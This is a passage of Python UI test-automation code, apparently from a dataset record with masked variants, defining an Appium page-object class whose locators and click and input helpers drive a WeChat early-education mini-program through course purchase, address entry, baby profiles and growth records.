click_delete_small_btn(self):\n self.click(self.delete_small_btn_loc)\n <mask token>\n\n def element_edition_btn(self):\n return self.find_element(self.edition_btn_loc)\n <mask token>\n\n def element_delete_small1_btn(self):\n return self.find_element(self.delete_small1_btn_loc)\n <mask token>\n\n def click_version_btn(self):\n self.click(self.version_btn_loc)\n <mask token>\n\n def clicks_experience_version_btn(self):\n self.clicks(self.experience_version_btn_loc, -1)\n <mask token>\n\n def element_audition_class_btn(self):\n return self.find_element(self.audition_class_btn_loc)\n\n def click_audition_class_btn(self):\n self.click(self.audition_class_btn_loc)\n <mask token>\n\n def click_wechat_grant_btn(self):\n self.click(self.wechat_grant_btn_loc)\n\n def double_click_wechat_grant(self):\n self.double_click(self.wechat_grant_btn_loc)\n\n def element_wechat_grant_btn(self):\n return self.find_element(self.wechat_grant_btn_loc)\n <mask token>\n\n def click_allow_btn(self):\n self.click(self.allow_btn_loc)\n <mask token>\n\n def click_mouth_btn(self):\n self.click(self.month_btn_loc)\n <mask token>\n\n def click_sure_btn(self):\n self.click(self.sure_btn_loc)\n <mask token>\n\n def class_info_btn(self):\n self.click(self.class_info_loc)\n <mask token>\n\n def element_attend_lectures_btn(self):\n return self.find_element(self.attend_lectures_btn_loc)\n\n def click_attend_lectures_btn(self):\n self.click(self.attend_lectures_btn_loc)\n <mask token>\n\n def element_class_btn(self):\n return self.find_element(self.class_btn_loc)\n <mask token>\n\n def click_get_to_know_btn(self):\n self.click(self.get_to_know_btn_loc)\n\n def element_get_to_know_btn(self):\n return self.find_element(self.get_to_know_btn_loc)\n <mask token>\n\n def click_sure_buy_btn(self):\n self.click(self.sure_buy_btn_loc)\n <mask token>\n\n def input_buy_password(self, paw):\n self.send_keys(self.buy_password_loc, paw)\n <mask token>\n\n def text_buy_money(self):\n return self.get_text(self.check_buy_money_loc)\n <mask token>\n\n def click_success_btn(self):\n self.click(self.success_btn_loc)\n <mask token>\n\n def click_check_address_btn(self):\n self.click(self.check_address_btn_loc)\n\n def element_check_address_btn(self):\n return self.find_element(self.check_address_btn_loc)\n <mask token>\n\n def click_add_address_btn(self):\n self.click(self.add_address_btn_loc)\n <mask token>\n\n def input_name_btn(self, name):\n self.send_keys(self.name_loc, name)\n <mask token>\n\n def input_phone_btn(self, phone):\n self.send_keys(self.phone_btn_loc, phone)\n <mask token>\n\n def click_region_btn(self):\n self.click(self.region_btn_loc)\n <mask token>\n\n def input_detailed_address_btn(self, address):\n self.send_keys(self.detailed_address_btn_loc, address)\n <mask token>\n\n def click_save_btn(self):\n self.click(self.save_btn_loc)\n <mask token>\n\n def click_receive_btn(self):\n self.click(self.receive_btn_loc)\n <mask token>\n\n def elements_addressee(self):\n return self.find_elements(self.addressee_loc)\n\n def clicks_addressee(self):\n self.clicks(self.addressee_loc, 0)\n <mask token>\n\n def element_know(self):\n return self.find_element(self.know_btn_loc)\n\n def click_know(self):\n self.click(self.know_btn_loc)\n <mask token>\n\n def element_all_curriculum_btn(self):\n return self.find_element(self.all_curriculum_btn_loc)\n\n def click_all_curriculum_btn(self):\n self.click(self.all_curriculum_btn_loc)\n <mask token>\n\n def element_curriculum_date_btn(self):\n return self.find_element(self.curriculum_date_btn_loc)\n <mask token>\n\n def element_my_btn(self):\n return self.find_element(self.my_btn_loc)\n\n def click_my(self):\n self.click(self.my_btn_loc)\n <mask token>\n\n def click_my_baby(self):\n self.click(self.my_baby_btn_loc)\n <mask token>\n\n def text_my_baby_title(self):\n return self.get_text(self.my_baby_title_loc)\n\n def elements_title(self):\n return self.find_elements(self.my_baby_title_loc)\n <mask token>\n\n def element_new_baby_btn(self):\n return self.find_element(self.new_baby_btn_loc)\n\n def click_new_baby_btn(self):\n self.click(self.new_baby_btn_loc)\n\n def clicks_new_baby_btn(self, n):\n self.clicks(self.new_baby_btn_loc, n)\n <mask token>\n\n def element_get_set(self):\n return self.find_element(self.get_set_loc)\n <mask token>\n\n def click_next(self):\n self.click(self.next_btn_loc)\n <mask token>\n\n def inputs_baby_name(self, name, n):\n self.sends_keys(self.baby_name_loc, name, n)\n <mask token>\n\n def click_baby_bir_btn(self):\n self.click(self.baby_bir_btn_loc)\n <mask token>\n\n def click_finish_btn(self):\n self.click(self.finish_btn_loc)\n\n def clicks_finish_btn(self, n):\n self.clicks(self.finish_btn_loc, n)\n <mask token>\n\n def click_my_home(self):\n self.click(self.my_home_loc)\n\n def element_my_home(self):\n return self.find_element(self.my_home_loc)\n <mask token>\n\n def click_switch_btn(self):\n self.click(self.switch_btn_loc)\n <mask token>\n\n def click_baby_bri(self):\n self.click(self.baby_bri_loc)\n <mask token>\n\n def clicks_class_img(self):\n self.clicks(self.class_img_btn_loc, 0)\n <mask token>\n\n def click_collection_btn(self):\n self.click(self.collection_btn_loc)\n\n def clicks_collection_btn(self, n):\n self.clicks(self.collection_btn_loc, n)\n\n def element_collection_btn(self):\n return self.find_element(self.collection_btn_loc)\n <mask token>\n\n def click_write_record_btn(self):\n self.click(self.write_record_btn_loc)\n\n def clicks_write_record_btn(self, n):\n self.clicks(self.write_record_btn_loc, n)\n <mask token>\n\n def click_album_btn(self):\n self.click(self.album_btn_loc)\n\n def element_album_btn(self):\n return self.find_element(self.album_btn_loc)\n <mask token>\n\n def click_small_video_btn(self):\n self.click(self.small_video_btn_loc)\n\n def element_small_video_btn(self):\n return self.find_element(self.small_video_btn_loc)\n <mask token>\n\n def click_release_btn(self):\n self.click(self.release_btn_loc)\n\n def clicks_release_btn(self, n):\n self.clicks(self.release_btn_loc, n)\n\n def element_record_info(self, data):\n record_info_loc = 'xpath', '//*[contains(@text, \"{}\")]'.format(data)\n record_info = self.find_element(record_info_loc)\n if record_info:\n return True\n else:\n return False\n <mask token>\n\n def click_class_name(self):\n self.click(self.class_name_loc)\n\n def clicks_class_name(self, n):\n self.clicks(self.class_name_loc, n)\n\n def elements_class_name(self):\n return self.find_elements(self.class_name_loc)\n <mask token>\n\n def click_class2_name(self):\n self.click(self.class_name2_loc)\n\n def clicks_class2_name(self, n):\n self.clicks(self.class_name2_loc, n)\n <mask token>\n\n def input_write_text(self, text):\n self.send_keys(self.write_text_loc, text)\n\n def inputs_write_text(self, text, n):\n self.sends_keys(self.write_text_loc, text, n)\n <mask token>\n\n def clicks_choice_album(self, n):\n self.clicks(self.choice_album_loc, n)\n\n def elements_choice_album(self):\n return self.find_elements(self.choice_album_loc)\n <mask token>\n\n def click_complete_btn(self):\n self.click(self.complete_btn_loc)\n <mask token>\n\n def click_my_collection_btn(self):\n self.click(self.my_collection_btn_loc)\n <mask token>\n\n def elements_my_collection_english_course_btn(self):\n return self.find_elements(self.my_collection_english_course_btn_loc)\n <mask token>\n\n def elements_my_collection_game_course_btn(self):\n return self.find_elements(self.my_collection_game_course_btn_loc)\n <mask token>\n\n def click_my_course_btn(self):\n self.click(self.my_course_btn_loc)\n <mask token>\n\n def elements_my_course_buy_btn(self):\n return self.find_elements(self.my_course_buy_btn_loc)\n <mask token>\n\n def click_my_order_btn(self):\n self.click(self.my_order_btn_loc)\n <mask token>\n\n def elements_my_order_card_btn(self):\n return self.find_elements(self.my_order_card_btn_loc)\n <mask token>\n\n def click_my_record_btn(self):\n self.click(self.my_record_btn_loc)\n <mask token>\n\n def elements_my_record_class_btn(self):\n return self.find_elements(self.my_record_class_btn_loc)\n <mask token>\n\n def element_back_btn(self):\n return self.find_element(self.back_btn_loc)\n\n def click_back_btn(self):\n self.click(self.back_btn_loc)\n <mask token>\n\n def click_reply_5(self):\n self.click(self.reply_5_loc)\n\n def elements_reply_5(self):\n return self.find_elements(self.reply_5_loc)\n <mask token>\n\n def click_add_to_btn(self):\n self.click(self.add_to_btn_loc)\n <mask token>\n\n def input_reply_5(self, num):\n self.send_keys(self.reply_input_5_loc, num)\n <mask token>\n\n def click_send(self):\n self.click(self.send_5_loc)\n <mask token>\n\n def elements_reply_code(self):\n return self.find_elements(self.reply_code_loc)\n\n def clicks_reply_code(self, n):\n self.clicks(self.reply_code_loc, n)\n <mask token>\n\n def element_long_code(self):\n return self.find_element(self.long_code_loc)\n\n def click_long_code(self):\n self.click(self.long_code_loc)\n <mask token>\n\n def click_discern_code(self):\n self.click(self.discern_code_loc)\n <mask token>\n\n def text_class_group(self):\n return self.get_text(self.class_group_loc)\n <mask token>\n\n def element_add_group_chat(self):\n return self.find_element(self.add_group_chat_loc)\n <mask token>\n\n def elements_reply_8(self):\n return self.find_elements(self.reply_8_loc)\n <mask token>\n\n def element_parent_btn(self):\n return self.find_element(self.parent_btn_loc)\n <mask token>\n\n def elements_info_btn(self):\n return self.find_elements(self.info_btn_loc)\n\n def clicks_info_btn(self, n):\n self.clicks(self.info_btn_loc, n)\n <mask token>\n\n def click_more_games_btn(self):\n self.click(self.more_games_btn_loc)\n <mask token>\n\n def click_look_all_btn(self):\n self.click(self.look_all_btn_loc)\n\n def element_look_all_btn(self):\n return self.find_elements(self.look_all_btn_loc)\n <mask token>\n\n def text_start_fingerprint_buy(self):\n return self.get_text(self.start_fingerprint_buy_loc)\n <mask token>\n\n def click_no_more_reminder_btn(self):\n self.click(self.no_more_reminder_btn_loc)\n <mask token>\n\n def click_cancel_btn(self):\n self.click(self.cancel_btn_loc)\n <mask token>\n\n def element_usd_password(self):\n return self.find_element(self.usd_password_loc)\n\n def click_usd_password(self):\n self.click(self.usd_password_loc)\n <mask token>\n\n def element_password_error(self):\n return self.find_element(self.password_error_loc)\n <mask token>\n\n def click_again_btn(self):\n self.click(self.again_btn_loc)\n <mask token>\n\n def text_payment(self):\n return self.get_text(self.payment_loc)\n <mask token>\n\n def element_typewriting_finish_btn(self):\n return self.find_element(self.typewriting_finish_btn_loc)\n\n def click_typewriting_finish_btn(self):\n self.click(self.typewriting_finish_btn_loc)\n <mask token>\n\n def click_clock_btn(self):\n self.click(self.clock_btn_loc)\n\n def element_clock_btn(self):\n return self.find_element(self.clock_btn_loc)\n <mask token>\n\n def element_no_clock_btn(self):\n return self.find_element(self.no_clock_btn_loc)\n <mask token>\n\n def click_get_card_btn(self):\n self.click(self.get_card_btn_loc)\n <mask token>\n\n def click_upload_card_btn(self):\n self.click(self.upload_card_btn_loc)\n <mask token>\n\n def click_again_upload_card_btn(self):\n self.click(self.again_upload_card_btn_loc)\n <mask token>\n\n def click_save_img_btn(self):\n self.click(self.save_img_btn_loc)\n <mask token>\n\n def click_copy_text_btn(self):\n self.click(self.copy_text_btn_loc)\n <mask token>\n\n def element_copy_format_btn(self):\n return self.find_element(self.copy_format_btn_loc)\n <mask token>\n\n def click_card_go_btn(self):\n self.click(self.card_go_btn_loc)\n <mask token>\n\n def click_upload_btn(self):\n self.click(self.upload_btn_loc)\n <mask token>\n\n def element_today_card_btn(self):\n return self.find_element(self.today_card_btn_loc)\n <mask token>\n\n def click_reset_img_btn(self):\n self.click(self.reset_img_btn_loc)\n <mask token>\n\n def element_generated_loading(self):\n return self.find_element(self.generated_loading_loc)\n <mask token>\n\n def element_reminder_btn(self):\n return self.find_element(self.reminder_btn_loc)\n <mask token>\n\n def element_page_expired(self):\n return self.find_element(self.page_expired_loc)\n <mask token>\n\n def click_x_btn(self):\n self.click(self.x_btn_loc)\n", "step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/4/14 14:31\n# @Author : lixiaofeng\n# @File : page_zaojiao.py\n# @Software: PyCharm\n# @desc :\n\nfrom common.basics import Crazy\n\n\nclass Zaojiaopage(Crazy):\n \"\"\"早教小程序\"\"\"\n\n zao_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/cx\" and @text=\"包妈优选\"]')\n\n # zao_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/cx\" and @text=\"小小包早教\"]')\n\n def click_zao(self):\n self.click(self.zao_btn_loc)\n\n def element_zao(self):\n return self.find_element(self.zao_btn_loc)\n\n find_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/d7b\" and @text=\"发现\"]') # 发现按钮\n\n def click_find(self):\n self.click(self.find_loc)\n\n title_btn_loc = ('xpath', '//*[@resource-id=\"android:id/title\" and @text=\"小程序\"]') # 发现页小程序按钮\n\n def click_title_btn(self):\n self.click(self.title_btn_loc)\n\n helper_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/c5\" and @text=\"小程序助手\"]') # 小程序助手\n\n def element_helper(self):\n return self.find_element(self.helper_loc)\n\n def click_helper(self):\n self.click(self.helper_loc)\n\n small_help_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/cx\" and @text=\"小程序助手\"]') # 小程序助手\n\n def click_small_help_btn(self):\n self.click(self.small_help_btn_loc)\n\n small_name_loc = ('xpath', '//*[contains(@text, \"包妈优选\")]') # 包妈优选\n\n def element_small_name(self):\n return self.find_element(self.small_name_loc)\n\n def click_small_name(self):\n self.click(self.small_name_loc)\n\n switching_applet_btn_loc = ('xpath', '//*[contains(@text, \"切换小程序\")]') # 切换小程序\n\n def click_switching_applet_btn(self):\n self.click(self.switching_applet_btn_loc)\n\n delete_small_btn_loc = ('xpath', '//*[contains(@text, \"删除\")]') # 删除小程序按钮\n\n def click_delete_small_btn(self):\n self.click(self.delete_small_btn_loc)\n\n edition_btn_loc = ('xpath', '//*[contains(@text, \"百宝福利Buy\")]')\n\n def element_edition_btn(self):\n return self.find_element(self.edition_btn_loc)\n\n delete_small1_btn_loc = ('xpath', '//*[contains(@text, \"拖动到此处删除\")]')\n\n def element_delete_small1_btn(self):\n return self.find_element(self.delete_small1_btn_loc)\n\n version_btn_loc = ('xpath', '//*[contains(@text, \"版本查看\")]') # 版本查看按钮\n\n def click_version_btn(self):\n self.click(self.version_btn_loc)\n\n experience_version_btn_loc = ('xpath', '//*[contains(@text, \"6.0.09\")]') # 体验版\n\n def clicks_experience_version_btn(self):\n self.clicks(self.experience_version_btn_loc, -1)\n\n audition_class_btn_loc = ('xpath', '//*[contains(@text, \"0元领取10节试听课\")]') # 领取试听课\n\n def element_audition_class_btn(self):\n return self.find_element(self.audition_class_btn_loc)\n\n def click_audition_class_btn(self):\n self.click(self.audition_class_btn_loc)\n\n wechat_grant_btn_loc = (('xpath', '//*[contains(@text, \"微信授权\") and @class=\"android.widget.Button\" ]')) # 微信授权\n\n def click_wechat_grant_btn(self):\n self.click(self.wechat_grant_btn_loc)\n\n def double_click_wechat_grant(self):\n self.double_click(self.wechat_grant_btn_loc)\n\n def element_wechat_grant_btn(self):\n return self.find_element(self.wechat_grant_btn_loc)\n\n allow_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/st\" and @text=\"允许\"]') # 完成按钮\n\n def click_allow_btn(self):\n self.click(self.allow_btn_loc)\n\n month_btn_loc = ('xpath', '//*[contains(@text, \"2018\")]') # 选择月份\n\n def click_mouth_btn(self):\n self.click(self.month_btn_loc)\n\n sure_btn_loc = ('xpath', '//*[contains(@text, \"确定\")]') # 确定按钮\n\n def click_sure_btn(self):\n self.click(self.sure_btn_loc)\n\n class_info_loc = ('xpath', '//*[contains(@text, \"课程介绍\")]') # 课程介绍\n\n # class_info_loc = ('xpath', '//android.widget.FrameLayout/android.view.ViewGroup[0]') # 课程介绍\n\n def class_info_btn(self):\n self.click(self.class_info_loc)\n\n attend_lectures_btn_loc = ('xpath', '//*[contains(@text, \"立即听课\")]') # 立即听课\n\n def element_attend_lectures_btn(self):\n return self.find_element(self.attend_lectures_btn_loc)\n\n def click_attend_lectures_btn(self):\n self.click(self.attend_lectures_btn_loc)\n\n class_btn_loc = ('xpath', '//*[contains(@text, \"预备课 预备课\")]') # 预备课 预备课\n\n def element_class_btn(self):\n return self.find_element(self.class_btn_loc)\n\n get_to_know_btn_loc = ('xpath', '//*[contains(@text, \"立即了解正式课 \")]') # 立即了解正式课\n\n def click_get_to_know_btn(self):\n self.click(self.get_to_know_btn_loc)\n\n def element_get_to_know_btn(self):\n return self.find_element(self.get_to_know_btn_loc)\n\n sure_buy_btn_loc = ('xpath', '//*[contains(@text, \"立即购买\")]') # 立即购买\n\n def click_sure_buy_btn(self):\n self.click(self.sure_buy_btn_loc)\n\n buy_password_loc = ('id', 'com.tencent.mm:id/cfs') # 输入支付密码\n\n def input_buy_password(self, paw):\n self.send_keys(self.buy_password_loc, paw)\n\n check_buy_money_loc = ('id', 'com.tencent.mm:id/dlh') # 获取支付金额\n\n def text_buy_money(self):\n return self.get_text(self.check_buy_money_loc)\n\n success_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/f8o\" and @text=\"完成\"]') # 完成按钮\n\n def click_success_btn(self):\n self.click(self.success_btn_loc)\n\n check_address_btn_loc = ('xpath', '//*[contains(@text, \"收货地址:请选择地址\")]') # 选择收货地址\n\n def click_check_address_btn(self):\n self.click(self.check_address_btn_loc)\n\n def element_check_address_btn(self):\n return self.find_element(self.check_address_btn_loc)\n\n add_address_btn_loc = ('xpath', '//*[contains(@text, \"添加地址\")]') # 添加地址\n\n def click_add_address_btn(self):\n self.click(self.add_address_btn_loc)\n\n name_loc = ('xpath', '//*[contains(@text, \"请输入你的姓名\")]') # 请输入你的姓名\n\n def input_name_btn(self, name):\n self.send_keys(self.name_loc, name)\n\n phone_btn_loc = ('xpath', '//*[contains(@text, \"请填写收件人电话\")]') # 请填写收件人电话\n\n def input_phone_btn(self, phone):\n self.send_keys(self.phone_btn_loc, phone)\n\n region_btn_loc = ('xpath', '//*[contains(@text, \"请输入你所在地区\")]') # 请输入你所在地区\n\n def click_region_btn(self):\n self.click(self.region_btn_loc)\n\n detailed_address_btn_loc = ('xpath', '//*[contains(@text, \"请输入你的详细地址\")]') # 请输入你的详细地址\n\n def input_detailed_address_btn(self, address):\n self.send_keys(self.detailed_address_btn_loc, address)\n\n save_btn_loc = ('xpath', '//*[contains(@text, \"保存\")]') # 保存\n\n def click_save_btn(self):\n self.click(self.save_btn_loc)\n\n receive_btn_loc = ('xpath', '//*[contains(@text, \"立即领取\")]') # 立即领取\n\n def click_receive_btn(self):\n self.click(self.receive_btn_loc)\n\n addressee_loc = ('xpath', '//*[contains(@text, \"收件人:\")]') # 地址列表是否有地址信息\n\n def elements_addressee(self):\n return self.find_elements(self.addressee_loc)\n\n def clicks_addressee(self):\n self.clicks(self.addressee_loc, 0)\n\n know_btn_loc = ('xpath', '//*[contains(@text, \"知道了\")]') # 地址列表是否有地址信息\n\n def element_know(self):\n return self.find_element(self.know_btn_loc)\n\n def click_know(self):\n self.click(self.know_btn_loc)\n\n all_curriculum_btn_loc = ('xpath', '//*[contains(@text, \"查看全部课程\")]') # 查看全部课程\n\n def element_all_curriculum_btn(self):\n return self.find_element(self.all_curriculum_btn_loc)\n\n def click_all_curriculum_btn(self):\n self.click(self.all_curriculum_btn_loc)\n\n curriculum_date_btn_loc = ('xpath', '//*[contains(@text, \"2019-0\")]') # 历史推送\n\n def element_curriculum_date_btn(self):\n return self.find_element(self.curriculum_date_btn_loc)\n\n my_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/ct\" and @text=\"我的\"]') # 我的\n\n def element_my_btn(self):\n return self.find_element(self.my_btn_loc)\n\n def click_my(self):\n self.click(self.my_btn_loc)\n\n my_baby_btn_loc = ('xpath', '//*[contains(@text, \"我的宝宝\")]') # 我的宝宝\n\n def click_my_baby(self):\n self.click(self.my_baby_btn_loc)\n\n my_baby_title_loc = ('id', 'com.tencent.mm:id/ox')\n\n def text_my_baby_title(self):\n return self.get_text(self.my_baby_title_loc)\n\n def elements_title(self):\n return self.find_elements(self.my_baby_title_loc)\n\n new_baby_btn_loc = ('xpath', '//*[contains(@text, \"新建宝宝\")]') # 新建宝宝\n\n def element_new_baby_btn(self):\n return self.find_element(self.new_baby_btn_loc)\n\n def click_new_baby_btn(self):\n self.click(self.new_baby_btn_loc)\n\n def clicks_new_baby_btn(self, n):\n self.clicks(self.new_baby_btn_loc, n)\n\n get_set_loc = ('xpath', '//*[contains(@text, \"预备课 预备课\")]') # 新建宝宝\n\n def element_get_set(self):\n return self.find_element(self.get_set_loc)\n\n next_btn_loc = ('xpath', '//*[contains(@text, \"下一步\")]') # 我的宝宝\n\n def click_next(self):\n self.click(self.next_btn_loc)\n\n baby_name_loc = ('xpath', '//*[contains(@text, \"请输入宝宝姓名\")]') # 请输入宝宝姓名\n\n def inputs_baby_name(self, name, n):\n self.sends_keys(self.baby_name_loc, name, n)\n\n baby_bir_btn_loc = ('xpath', '//*[contains(@text, \"宝宝的生日:\")]') # 宝宝的生日\n\n def click_baby_bir_btn(self):\n self.click(self.baby_bir_btn_loc)\n\n finish_btn_loc = ('xpath', '//*[contains(@text, \"完成\")]') # 完成按钮\n\n def click_finish_btn(self):\n self.click(self.finish_btn_loc)\n\n def clicks_finish_btn(self, n):\n self.clicks(self.finish_btn_loc, n)\n\n my_home_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/ct\" and @text=\"首页\"]') # 首页\n\n def click_my_home(self):\n self.click(self.my_home_loc)\n\n def element_my_home(self):\n return self.find_element(self.my_home_loc)\n\n switch_btn_loc = ('xpath', '//*[contains(@text, \"切换\")]') # 切换\n\n def click_switch_btn(self):\n self.click(self.switch_btn_loc)\n\n baby_bri_loc = ('xpath', '//*[contains(@text, \"宝宝生日:\")]') # 宝宝生日:\n\n def click_baby_bri(self):\n self.click(self.baby_bri_loc)\n\n class_img_btn_loc = ('xpath', 'android.widget.Image')\n\n def clicks_class_img(self):\n self.clicks(self.class_img_btn_loc, 0)\n\n collection_btn_loc = ('xpath', '//*[contains(@text, \"收藏\")]') # 收藏\n\n def click_collection_btn(self):\n self.click(self.collection_btn_loc)\n\n def clicks_collection_btn(self, n):\n self.clicks(self.collection_btn_loc, n)\n\n def element_collection_btn(self):\n return self.find_element(self.collection_btn_loc)\n\n write_record_btn_loc = ('xpath', '//*[contains(@text, \"写记录\") and @class=\"android.widget.Button\" ]') # 写记录按钮\n\n def click_write_record_btn(self):\n self.click(self.write_record_btn_loc)\n\n def clicks_write_record_btn(self, n):\n self.clicks(self.write_record_btn_loc, n)\n\n album_btn_loc = ('xpath', '//*[contains(@text, \"相册\")]') # 相册\n\n def click_album_btn(self):\n self.click(self.album_btn_loc)\n\n def element_album_btn(self):\n return self.find_element(self.album_btn_loc)\n\n small_video_btn_loc = ('xpath', '//*[contains(@text, \"小视频\")]') # 小视频\n\n def click_small_video_btn(self):\n self.click(self.small_video_btn_loc)\n\n def element_small_video_btn(self):\n return self.find_element(self.small_video_btn_loc)\n\n release_btn_loc = ('xpath', '//*[contains(@text, \"发布\")]') # 发布\n\n def click_release_btn(self):\n self.click(self.release_btn_loc)\n\n def clicks_release_btn(self, n):\n self.clicks(self.release_btn_loc, n)\n\n def element_record_info(self, data): # 判断是否定位到包含text的元素\n record_info_loc = ('xpath', '//*[contains(@text, \"{}\")]'.format(data))\n record_info = self.find_element(record_info_loc)\n if record_info:\n return True\n else:\n return False\n\n class_name_loc = ('xpath', '//*[contains(@text, \"歌曲\")]') # 课程名称\n\n # class_name_loc = ('xpath', '//*[contains(@text, \"歌曲:Head and shoulders\")]') # 课程名称\n\n def click_class_name(self):\n self.click(self.class_name_loc)\n\n def clicks_class_name(self, n):\n self.clicks(self.class_name_loc, n)\n\n def elements_class_name(self):\n return self.find_elements(self.class_name_loc)\n\n class_name2_loc = ('xpath', '//*[contains(@text, \"一起走\")]') # 课程名称\n\n # class_name2_loc = ('xpath', '//*[contains(@text, \"弹出来的画\")]') # 课程名称\n\n def click_class2_name(self):\n self.click(self.class_name2_loc)\n\n def clicks_class2_name(self, n):\n self.clicks(self.class_name2_loc, n)\n\n write_text_loc = ('xpath', '//*[contains(@text, \"0/1000\")]') # 写记录\n\n def input_write_text(self, text):\n self.send_keys(self.write_text_loc, text)\n\n def inputs_write_text(self, text, n):\n self.sends_keys(self.write_text_loc, text, n)\n\n choice_album_loc = ('id', 'com.tencent.mm:id/bpy')\n\n def clicks_choice_album(self, n):\n self.clicks(self.choice_album_loc, n)\n\n def elements_choice_album(self):\n return self.find_elements(self.choice_album_loc)\n\n complete_btn_loc = ('id', 'com.tencent.mm:id/ki') # 完成\n\n def click_complete_btn(self):\n self.click(self.complete_btn_loc)\n\n my_collection_btn_loc = ('xpath', '//*[contains(@text, \"我的收藏\")]') # 我的收藏\n\n def click_my_collection_btn(self):\n self.click(self.my_collection_btn_loc)\n\n my_collection_english_course_btn_loc = ('xpath', '//*[contains(@text, \"早教\")]') # 早教英语课\n\n def elements_my_collection_english_course_btn(self):\n return self.find_elements(self.my_collection_english_course_btn_loc)\n\n my_collection_game_course_btn_loc = ('xpath', '//*[contains(@text, \"宝宝游戏馆\")]') # 宝宝游戏馆\n\n def elements_my_collection_game_course_btn(self):\n return self.find_elements(self.my_collection_game_course_btn_loc)\n\n my_course_btn_loc = ('xpath', '//*[contains(@text, \"我的课程\")]') # 我的课程\n\n def click_my_course_btn(self):\n self.click(self.my_course_btn_loc)\n\n my_course_buy_btn_loc = ('xpath', '//*[contains(@text, \"早教核心课年卡\")]') # 早教核心课年卡\n\n def elements_my_course_buy_btn(self):\n return self.find_elements(self.my_course_buy_btn_loc)\n\n my_order_btn_loc = ('xpath', '//*[contains(@text, \"我的订单\")]') # 我的订单\n\n def click_my_order_btn(self):\n self.click(self.my_order_btn_loc)\n\n my_order_card_btn_loc = ('xpath', '//*[contains(@text, \"订单编号:\")]') # 订单编号:\n\n def elements_my_order_card_btn(self):\n return self.find_elements(self.my_order_card_btn_loc)\n\n my_record_btn_loc = ('xpath', '//*[contains(@text, \"成长记录\")]') # 成长记录\n\n def click_my_record_btn(self):\n self.click(self.my_record_btn_loc)\n\n my_record_class_btn_loc = ('xpath', '//*[contains(@text, \"#\")]') # # 测试英语课程组\n\n def elements_my_record_class_btn(self):\n return self.find_elements(self.my_record_class_btn_loc)\n\n back_btn_loc = (\n 'xpath', '//*[@resource-id=\"com.tencent.mm:id/on\" and @class=\"android.widget.LinearLayout\"]') # 返回按钮\n\n def element_back_btn(self):\n return self.find_element(self.back_btn_loc)\n\n def click_back_btn(self):\n self.click(self.back_btn_loc)\n\n reply_5_loc = ('xpath', '//android.widget.Image') # 回复5\n\n def click_reply_5(self):\n self.click(self.reply_5_loc)\n\n def elements_reply_5(self):\n return self.find_elements(self.reply_5_loc)\n\n add_to_btn_loc = ('xpath', '//*[contains(@text, \"立即添加\")]') # 立即添加\n\n def click_add_to_btn(self):\n self.click(self.add_to_btn_loc)\n\n reply_input_5_loc = ('id', 'com.tencent.mm:id/ami')\n\n def input_reply_5(self, num):\n self.send_keys(self.reply_input_5_loc, num)\n\n send_5_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/amp\" and @text=\"发送\"]') # 发送\n\n def click_send(self):\n self.click(self.send_5_loc)\n\n reply_code_loc = ('id', 'com.tencent.mm:id/ap9') # 获取回复的二维码\n\n def elements_reply_code(self):\n return self.find_elements(self.reply_code_loc)\n\n def clicks_reply_code(self, n):\n self.clicks(self.reply_code_loc, n)\n\n long_code_loc = ('id', 'com.tencent.mm:id/adi') # 长按二维码\n\n def element_long_code(self):\n return self.find_element(self.long_code_loc)\n\n def click_long_code(self):\n self.click(self.long_code_loc)\n\n discern_code_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/cx\" and @text=\"识别图中二维码\"]') # 识别图中二维码\n\n def click_discern_code(self):\n self.click(self.discern_code_loc)\n\n class_group_loc = ('id', 'android:id/text1') # 群名称\n\n def text_class_group(self):\n return self.get_text(self.class_group_loc)\n\n add_group_chat_loc = ('xpath', '//*[contains(@text, \"加入该群聊\")]') # 加入该群聊\n\n def element_add_group_chat(self):\n return self.find_element(self.add_group_chat_loc)\n\n reply_8_loc = ('xpath', '//android.widget.Image') # 回复8的banner 回复8->进公众号->点击推送 看到的二维码\n\n def elements_reply_8(self):\n return self.find_elements(self.reply_8_loc)\n\n parent_btn_loc = ('xpath', '//*[contains(@text, \"亲爱的家长:\")]') # 亲爱的家长:\n\n def element_parent_btn(self):\n return self.find_element(self.parent_btn_loc)\n\n info_btn_loc = ('id', 'com.tencent.mm:id/a8q') # 详情\n\n def elements_info_btn(self):\n return self.find_elements(self.info_btn_loc)\n\n def clicks_info_btn(self, n):\n self.clicks(self.info_btn_loc, n)\n\n more_games_btn_loc = ('xpath', '//*[contains(@text, \"更多亲子游戏\")]') # 更多亲子游戏\n\n def click_more_games_btn(self):\n self.click(self.more_games_btn_loc)\n\n look_all_btn_loc = ('xpath', '//*[contains(@text, \"查看全部\")]') # 查看全部\n\n def click_look_all_btn(self):\n self.click(self.look_all_btn_loc)\n\n def element_look_all_btn(self):\n return self.find_elements(self.look_all_btn_loc)\n\n start_fingerprint_buy_loc = ('id', 'com.tencent.mm:id/btp') # 开启指纹支付弹窗文本 开启指纹支付,支付时可通过验证指纹快速完成付款。\n\n def text_start_fingerprint_buy(self):\n return self.get_text(self.start_fingerprint_buy_loc)\n\n no_more_reminder_btn_loc = ('id', 'com.tencent.mm:id/btq') # 不再提醒\n\n def click_no_more_reminder_btn(self):\n self.click(self.no_more_reminder_btn_loc)\n\n cancel_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/azz\" and @text=\"取消\"]') # 取消\n\n def click_cancel_btn(self):\n self.click(self.cancel_btn_loc)\n\n usd_password_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/fg4\" and @text=\"使用密码\"]') # 使用密码\n\n def element_usd_password(self):\n return self.find_element(self.usd_password_loc)\n\n def click_usd_password(self):\n self.click(self.usd_password_loc)\n\n password_error_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/d8x\" and @text=\"支付密码错误,请重试\"]') # 支付密码错误,请重试\n\n def element_password_error(self):\n return self.find_element(self.password_error_loc)\n\n again_btn_loc = ('xpath', 